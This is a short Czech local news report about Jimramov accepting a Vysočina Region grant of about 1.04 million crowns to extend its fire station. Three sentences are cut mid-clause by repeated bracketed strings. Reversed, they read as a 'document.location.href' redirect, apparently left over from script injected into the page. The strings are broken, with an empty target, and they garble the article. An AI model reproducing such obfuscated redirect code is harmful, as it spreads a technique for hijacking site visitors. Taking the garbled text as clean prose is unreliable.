Rainbow page separator

Jimramov získá krajskou dotaci na nástavbu hasičské zbrojnice

Pondělí, 20. srpna 2018

Peníze, papírové bankovky

Jimramov / Příslib veřejné dotace ve výši 1 037 564,31 koruny od Kraje Vysočina se rozhodli přijmout jimramovští zastupitelé, a [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to prostřednictvím uzavření veřejnoprávní smlouvy mezi krajem a městysem. Peníze, o které vedení městyse žádalo, pomohou tamnímu sboru dobrovolných hasičů.
Zmíněné „přiklepnuté“ finance [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];totiž poslouží na další stavební úpravy jimramovské hasičské zbrojnice. Oficiálním účelem peněžní pomoci je poskytnutí účelové investiční veřejné finanční podpory z rozpočtu Kraje Vysočina, a [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to na projekt nazvaný Jimramov – stavební úprava a nástavba hasičské zbrojnice.